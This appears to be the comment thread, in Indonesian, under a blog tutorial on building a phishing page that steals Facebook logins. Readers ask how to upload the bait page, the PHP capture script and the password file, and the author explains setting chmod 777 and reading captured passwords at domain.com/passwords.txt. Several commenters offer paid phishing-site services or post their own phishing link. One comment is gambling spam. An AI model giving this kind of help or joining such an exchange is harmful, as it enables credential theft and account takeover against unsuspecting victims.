      Apakah sudah benar lokasi root dokumen nya saat mengupload ? dibawah index of/ ada file2 yang anda upload tidak ?

      Reply
      • rahmat

        Agustus 12, 2012 at 1:48 am27

        ada tp file itu sm dgn file yg da dlm publik_html yg aq upload sblumnya,,tp stlh di klik mlh file trsebut menuju tmpt download,,,,

        Reply
        • Amri

          Agustus 12, 2012 at 2:07 am27

          file yang di upload sudah ada index.html atau index.php nya belum ?

          Reply
  82. putra bahari

    Agustus 20, 2012 at 1:49 pm27

    gan ane masih belum ngerti gan……
    yang pas peng upload.annye
    tolong bantuannya gan….ane pengen bisa
    mas amri , ni no ane
    08571831xxxx
    thx

    Reply
    • Amri

      Agustus 22, 2012 at 7:36 pm27

      Kalo cara mengupload belum bisa silahkan cari-cari tutorial untuk cara upload file ke hosting terlebih dahulu. Dan maaf saya tidak melayani telp/sms, ada pertanyaan diblog silahkan tanyakan via komentar, ym/email, atau skype saja..

      Reply
  83. ichwan

    Maret 16, 2013 at 2:45 pm25

    cara ganti permision nya gmana min..?? bingung nih password nya ga muncul

    Reply
  84. epy

    Agustus 22, 2013 at 10:38 am28

    mas gan mo tanya ne, ntar klo liat pwnya lewat “PPP” yg ada dmna? di comp ato di uploadtan hosting sendiri? mkasih

    Reply
    • Amri

      Agustus 22, 2013 at 12:41 pm28

      Liatnya di hostingnya. tinggal akses aja domain.com/passwords.txt kalo tempat nyimpen passwordnya di passwords.txt.

      Reply
      • epy

        Agustus 23, 2013 at 6:57 am27

        ok makasih mas gan

        Reply
      • epy

        Agustus 23, 2013 at 7:09 am27

        maaf tanya lagi mas gan, permission/chmod
        di atur 777 itu letaknya dmna?maksih

        Reply
  85. jafar

    Agustus 25, 2013 at 12:49 am28

    gan,kok 3 yg di upload?? kan cuma 2???
    treus ksih tutor domainya dan hostingnya dong

    Reply
    • Amri

      Agustus 25, 2013 at 4:09 am27

      Masa sih cuma 2 ? coba dibaca lagi. Wah, ini udah mainan lama udah nggak main kaya beginian lagi. hehee

      Reply
      • jafar

        Agustus 31, 2013 at 10:50 am28

        o ya 3,yg ekstensi d jadiin 2 yaa..
        cra gnti chmodnya gmn??

        Reply
        • Amri

          Agustus 31, 2013 at 12:48 pm28

          Yang ekstensi di jadiin 2 gimana ? Cara gandi chmodnya di file manager cpanel hostingnya, nanti ada tulisan chmod atau permission.

          Reply
  86. Fay Likers

    Agustus 31, 2013 at 10:26 pm28

    Hahahah
    Buahhahahah masa bkin web phsing aja pada kga becus.
    Itu lagih masa bkin password.txt aja pda ga ngrti.
    Add fb gue coy. Biar lo pada pintar
    buahhahahah
    http://www.facebook.com/faylikers Di tunggu All Broo,
    Min bagus ente udh Post.
    mat knal ye

    Reply
  87. Fikri

    Oktober 31, 2013 at 8:13 pm27

    lokasi upload dimn gan,,,, ?

    Reply
    • fzcraft

      Januari 2, 2014 at 11:54 am27

      Terserah

      Reply
  88. Aliyafi Rizky

    November 23, 2013 at 10:15 am29

    web phising ane http://botkomen.esy.es

    Reply
  89. muhammad adham

    Desember 19, 2013 at 10:47 pm29

    maksud Ini apa yah ??
    Setelah ke-3 file berhasil di upload jangan lupa permission/chmod di atur 777 untuk filepasswords.txt, agar password yang di ketikan oleh korban dapat tersimpan.

    Reply
    • fzcraft

      Januari 2, 2014 at 11:53 am27

      Gini lho Buat file passwords.txt kosong jangan di edit dalamnya

      Reply
  90. Shadow

    Desember 27, 2013 at 3:30 pm28

    kalau domainnya pake facebook gimana bang

    Reply
    • Daffa

      Mei 5, 2015 at 3:38 pm22

      Mana mungkin bisa gan

      Reply
  91. Shadow

    Desember 27, 2013 at 3:30 pm28

    tolong bales gan

    Reply
  92. getsa novandra

    Januari 9, 2014 at 8:34 pm26

    terima kasih kak saya sudah bisa nih

    Reply
  93. raja doli

    Maret 8, 2014 at 11:39 pm25

    nmr 13 gmna gan

    Reply
  94. ivhot pebrian

    Mei 16, 2014 at 1:36 pm23

    kakak saya belum ngerti, tolong jelasin dong kakak, kalau bisa lewat email, [email protected]

    Reply
  95. andri

    Juni 5, 2014 at 11:09 am24

    gan saya tidak mengerti No. 15 sampai 19. . . .
    gimana caranya gan. . . . .

    Reply
  96. dodo

    Juni 26, 2014 at 9:30 am24

    SAYA UCAPKAN TERIMA KASIH KEPADA MBAH_KERAMAT, YG SUDAH MEMBANTU KESUSAHAN SAYA DENGAN MEMBERIKAN NOMOR TOGEL KEPADA SAYA.
    SAYA SANGAT BERSUKUR SEKALI KARENA NOMOR YG DIBERIKAN 4D(0215) TEMBUS 100%.
    BERKAT SEMUA ITU SAYA SUDAH LUNASI HUTANG2 SAYA SEBANYAK 175 JUTA DI BANK BRI.
    DAN SAYA SUDAH BUKA USAHA BERKAT MENANG NOMOR TOGEL YANG DI BERIKAN SAMA MBAH_KERAMAT…..
    -JIKA ANDA SERING KALAH DALAM BERMAIN TOGEL?
    -APAKAH ANDA TERMASUK DALAM KATEGORI DIBAWAH INI
    1. Di Lilit Hutang
    2. Selalu kalah Dalam Bermain Togel
    3. Barang berharga Anda udah Habis Buat Judi Togel
    4. Anda Udah ke mana-mana tapi tidak menghasilkan Solusi yang tepat.
    HUB MBAH_KERAMAT DI NO: 0878-4293-7066-
    .ANGKA TOGEL YANG DIBERIKAN MBAH_KERAMAT. TIDAK PERLU DIRAGUKAN LAGI.SAYA JAMIN 100% TEMBUS . SOAL YA SAYA SUDAH MEMBUKTIKAN 5X PUTARAN SAYA DIBANTUH
    DIJAMIN ANDA PASTI MENANG SEPERTI SAYA>>>>>>
    .(`??.?(` ??. ?* ?.???)?.???)..
    ?? Thanks sOb rOoMnyA ?`?
    ..(?. ???(?.??? * `??.?)`??.? )..
    SALAM KOMPAK SELALU?.dan selamat buat yg JEPE hari ini?..
    ???????????????

    Reply
  97. ZXCVAKZlaM

    Juni 26, 2014 at 5:07 pm24

    KA ini page source FB nya udah beda jadi gimana dong?

    Reply
  98. Anonymous&

    September 2, 2014 at 7:35 pm28

    Gw Sih Sudah Bisa Buat Phising Tapi Percuma../ Karena Di Blockir Sm Internet Positif
    Jdi Gk Bisa Di Buka ๐Ÿ™

    Reply
  99. Muhammad Zulfan

    September 10, 2014 at 10:03 am30

    Nice bro :3

    Reply
  100. Fachrul Izzami

    Desember 2, 2014 at 9:08 am27

    kalo buat gemscool bisa ?

    Reply
    • Daffa

      Mei 5, 2015 at 3:36 pm22

      Mau bikin phising untuk gemscool mas?

      Reply
  101. ady

    April 18, 2015 at 3:37 pm25

    boss kok phising sy gak jaadi”
    ada no yg bisa di hubungi kah boss ?

    Reply
  102. ady

    April 18, 2015 at 3:38 pm25

    gua udah buka link gua, tapi yg muncil hanya INDEX OF/
    umpan scripnya kayak gak berfungsi

    Reply
  103. Daffa

    Mei 5, 2015 at 3:34 pm22

    PHP nya bermasalah mas. Malah muncul”Parse error: syntax error, unexpected ‘=’ in /home/u920835651/public_html/phising.php on line 5″

    Reply
  104. Aliefki Pradithya

    September 27, 2015 at 2:58 pm29

    gan cara liat passwordnya gimana??

    Reply
  105. deka miranda

    Oktober 5, 2015 at 2:44 pm26

    mas kok form action di wordpad ane gk ada…..?

    Reply
    • Rafli Diansyah Putra

      Desember 19, 2016 at 4:53 pm28

      cari method .. pasti ketemu action nya ..

      Reply
  106. Herman

    Oktober 28, 2015 at 4:22 pm27

    Gw Kgk bisa Install File di Free Hosting 000webhost

    Reply
  107. unknow

    Januari 7, 2016 at 4:31 pm26

    kok g ke simpen di password.txt ya?

    Reply
  108. indra romigo

    Oktober 7, 2016 at 4:18 pm26

    gan saya bisa mnta tolong..buat kan fishing,,saya nggak ngerti

    Reply
  109. ourmine

    Oktober 14, 2016 at 8:54 pm27

    Gan password.txt nya ketinggalan tu blm ente posting

    Reply
  110. ourmine

    Oktober 14, 2016 at 9:00 pm27

    Menerima jasa pembuatan web phising COC, FB, IG dan TWITTER.
    add pin bb: D1CBA539

    Reply
  111. Rafli Diansyah Putra

    Desember 19, 2016 at 4:52 pm28

    gan .. saya udah tiru semuanya tapi kalau fail index.html dibuka dari 000webhost tulisannya eror ..
    dan juga gak nyimpan password nya ..
    link yg akan kita ambil untuk di share sebagai jebakan yang mana???
    butuh bimbingan gan …
    https://uploads.disquscdn.com/images/3df62209945ed25a407e38eb5ce3d55b51910f6f7d9b1cbb13ba73beb218ae48.pn

    Reply
  112. Rafli Diansyah Putra

    Desember 19, 2016 at 4:58 pm28

    saya gak mau beli mas tapi ajarin saya aja .. ntar saya kasih pulsa .. kalau work ..

    Reply
  113. Eka

    Maret 19, 2017 at 7:05 am25

    Gimana si sy masi blm ngerti tolong jawab

    Reply
    • Eka

      Maret 19, 2017 at 7:06 am25

      Klo work sy kasi akun klo work y

      Reply
  114. yutim

    Maret 22, 2017 at 3:00 pm25

    Membuatnya Dari HP bisa gk broo.

    Reply
    • Amri

      Maret 28, 2017 at 5:29 pm25

      bisa sebenarnya tapi ribet dan tutorial ini menggunakan komputer

      Reply
  115. achir

    Maret 28, 2017 at 2:01 pm25

    kok yang di upload ada 3, padahal kan file yang di buat di notepad cuman 2, yang satu di mana gan…?

    Reply
    • Amri

      Maret 28, 2017 at 5:29 pm25

      Maaf sebelumnya karena jarang keurus blog nya jadi banyak post yang error..
      Untuk file yang diupload ada 3 yaitu : index.html, phising.php dan password.txt

      Reply
  116. Till Skyfall

    April 18, 2017 at 9:47 am25

    Jasa Pembuatan Web Phising: D815A16C

    Reply
    • baden

      Mei 3, 2017 at 12:19 pm23

      terima jasa pembuatan phising gan

      Reply
  117. Web Hosting Buat Phising – My Blog

    Mei 5, 2017 at 3:09 pm22

    […] Cara Membuat Web Phising […]

    Reply
  118. Ramdhan

    Mei 20, 2017 at 10:59 pm24

    meriksa email dan pw korban d mana gan?? mohon penjelasannya

    Reply
  119. Indra Fata Eberta

    Mei 22, 2017 at 2:58 pm23

    bang cara lihat password korban dan situs web phising kita dimana ya ?

    Reply
    • Sandi Noer

      September 23, 2017 at 3:48 pm29

      Sama gan yg saya juga gak ada pemberitahuan

      Reply
  120. 4 Cara Hack Facebook Orang serta Cara Melindungi Diri Dari Hack Tersebut | Majalah Tutorial

    Mei 26, 2017 at 11:18 am24

    […] memerlukan bantuan dengan langkah-langkah yang tepat, ada petunjuk rinci yang tersedia oleh Amri di Kentos.org ini. Sekarang pengguna sangat berhati-hati dengan login ke Facebook melalui link lainnya, meskipun […]

    Reply
  121. ian

    Juni 21, 2017 at 3:43 pm24

    keluar ginian aja
    Parse error: syntax error, unexpected ‘=’ in /storage/ssd1/993/2028993/public_html/phising.php on line 5
    trus gmna???

    Reply
  122. Ahmad Hanief

    Juli 1, 2017 at 11:00 am24

    apa itu permission/chmod

    Reply
  123. Sayyid N R

    September 27, 2017 at 10:38 am30

    cara spoofing nya kaya mana ?

    Reply
  124. Sedikit Cerita Tentang Blog Lama Saya

    November 15, 2017 at 3:20 am28

    […] saja alamat dimana kita akan login ke Facebook atau yang lainnya. Karena biasanya apabila seseorang membuat Web Phising akan ada perbedaan pada address bar/alamat URL-nya. Contoh http://www.facebook.com sebagai url facebook […]

    Reply
  125. Demas Reyhan Adritama

    November 23, 2017 at 12:46 pm29

    password.txt buatnya gimana ?

    Reply
  126. 4 Cara Hack Facebook Orang Serta Cara Melindungi Diri Dari Hack Tersebut - CoffeePedia

    Desember 21, 2017 at 7:05 pm28

    […] tunjangan dengan langkah-langkah yang tepat, ada petunjuk rinci yang tersedia oleh Amri di Kentos.org ini. Sekarang pengguna sangat berhati-hati dengan login ke Facebook melalui link lainnya, meskipun […]

    Reply
  127. kafka hakc20

    Maret 4, 2018 at 11:07 pm25

    saya masih blom bisa tolong bantu saya plizzz…

    Reply
  128. 4 Cara Hack Facebook Orang Serta Cara Melindungi Diri Dari Hack Tersebut | Bilik Putih

    Oktober 8, 2018 at 1:10 pm26

    […] proteksi dengan langkah-langkah yang tepat, ada petunjuk rinci yang tersedia oleh Amri di Kentos.org ini. Sekarang pengguna sangat berhati-hati dengan login ke Facebook melalui link lainnya, meskipun […]

    Reply
  129. hasbizainal

    Januari 8, 2019 at 1:13 pm26

    buat kan web phising nya admin nanti gue bayar brp pun jadi

    Reply
  130. Sicantik Huked

    Januari 24, 2019 at 6:54 pm27

    Bagus Sangat Bermanfat ๐Ÿ™‚
    Jangan Lupa Mampir Juga KeBlogku Yah ๐Ÿ™‚

    Reply
  131. Rudy Wahyu

    April 22, 2019 at 2:12 pm25

    punya ku pas ngakses phising.php kok error kenapa ya bang

    Reply
  132. Reza Hidayat

    Oktober 7, 2019 at 4:18 pm26

    cara buat file password.txt nya gimna?….kok saya ada 2 file doang

    Reply

Tinggalkan Balasan

Alamat email Anda tidak akan dipublikasikan. Ruas yang wajib ditandai *

%d blogger menyukai ini: